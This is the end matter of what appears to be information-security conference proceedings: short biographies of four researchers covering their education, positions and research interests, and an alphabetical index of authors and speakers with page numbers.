Matthew Tentilucci completed his undergraduate studies at Rochester Institute of Technology, where he graduated cum laude with a double major in Computer Security, and Applied Networking and Systems Administration. He then continued his academic career at The Pennsylvania State University where he earned an M.S. in Information Sciences and Technology. For his master's thesis, Matthew explored methods to securely acquire digital evidence from VMware ESXi hypervisors. Matthew is currently living in Maryland with his wife, Sarah, and their dog and cat, Rocco and Luna. He currently works for the United States Government.

Merrill Warkentin is a Professor of MIS and the Drew Allen Endowed Fellow in the College of Business at Mississippi State University. His research, primarily on the impacts of organizational, contextual, situational, and dispositional factors on individual user behaviors in the context of information security and privacy, addresses security policy compliance/violation and social media use, and has appeared in MIS Quarterly, Decision Sciences, European Journal of Information Systems, Decision Support Systems, Computers & Security, Information Systems Journal, Communications of the ACM, Communications of the AIS, Journal of Information Systems, and others. He is the author or editor of several books on technology, including a 2015 book on Data Analytics. He is the AIS Departmental Editor for IS Security & Privacy, the Chair of the UN-sponsored IFIP Working Group on IS Security Research, an Associate Editor for MIS Quarterly and Information & Management, an SE for AIS Transactions on Replication Research, and the Eminent Area Editor (MIS) for Decision Sciences. He has chaired several international conferences, has chaired security/privacy tracks at ICIS, AMCIS, ECIS, and DSI, and will be the 2016 AMCIS Program Co-Chair. His work has been funded by NSF, IBM, NSA, DoD, Homeland Security, and others. Dr. Warkentin served as a Distinguished Lecturer for the Association for Computing Machinery (ACM).

Abukari Mohammed Yakubu received the B.S. degree in computer engineering from Kwame Nkrumah University of Science and Technology, Kumasi, Ghana in 2007. From June 2008 to October 2008, he worked as a software engineer for SISCO Information Systems, Accra, Ghana. He also worked at Mobile Telecommunications Network (MTN), Accra, Ghana, from 2008 to 2013, as a VAS engineer involved in the integration and deployment of telecommunication value added services. Since 2013, he has been a research assistant in the Department of Applied Computer Science, University of Winnipeg, MB, Canada. His research interest is in multimedia security and privacy, focusing on audio/speech.

Yanjun Zuo is a professor of information systems at the University of North Dakota, Grand Forks, ND, USA. He received a PhD degree from the University of Arkansas, Fayetteville, USA. His research interests include trustworthy computing, database systems, and information security. He has published numerous articles in refereed journals and conference proceedings including Decision Support Systems, IEEE Transactions on Dependable and Secure Computing, IEEE Transactions on Systems, Man and Cybernetics, Journal of Information Management and Computer Security, Information Systems Frontiers, International Conference on Information Systems (ICIS), and Hawaii International Conference on System Sciences (HICSS).


INDEX OF AUTHORS / SPEAKERS

Atrey, Pradeep K. pp. 39-43
Babbitt, Thomas pp. 51-56
Barry, Charles p. 32
Bogaard, Dan pp. 19-23
Califano, Anthony pp. 44-50
Campillo, Reiner pp. 60-66
Chang, Ming-Ching pp. 34-37
Chaturvedi, Manmohan pp. 28-31
Chaudhari, Narendra S. pp. 67-72
Dincelli, Ersin pp. 44-50
Goel, Sanjay pp. 32, 38, 44-50
Gupta, Srishti pp. 28-31
Harmat, Bryan pp. 24-27
Hart, Delbert pp. 7-13
Hartley, John G. p. 38
Herath, Hemantha p. 18
Herath, Tejaswini p. 18
Hong, Yuan p. 38
Johnson, Daryl pp. 19-23, 24-27
Kandari, Shreshth pp. 19-23
Kisekka, Victoria pp. 57-59
Lute, Jane Holl p. 1
Lyu, Siwei pp. 34-37
Maddage, Namunu C. pp. 39-43
Markowsky, George pp. 19-23
McConnell, Bruce p. 33
Mutchler, Leigh A. pp. 2-6
Oh, Tae pp. 60-66
Pulver, Andrew pp. 34-37
Roberts, Nick pp. 19-23
Saxena, Neetesh pp. 67-72
Stackpole, Bill pp. 19-23
Stroud, Jared pp. 24-27
Szymanski, Boleslaw pp. 51-56
Tentilucci, Matt pp. 19-23
Warkentin, Merrill pp. 2-6
Yakubu, Abukari M. pp. 39-43
Zuo, Yanjun pp. 14-17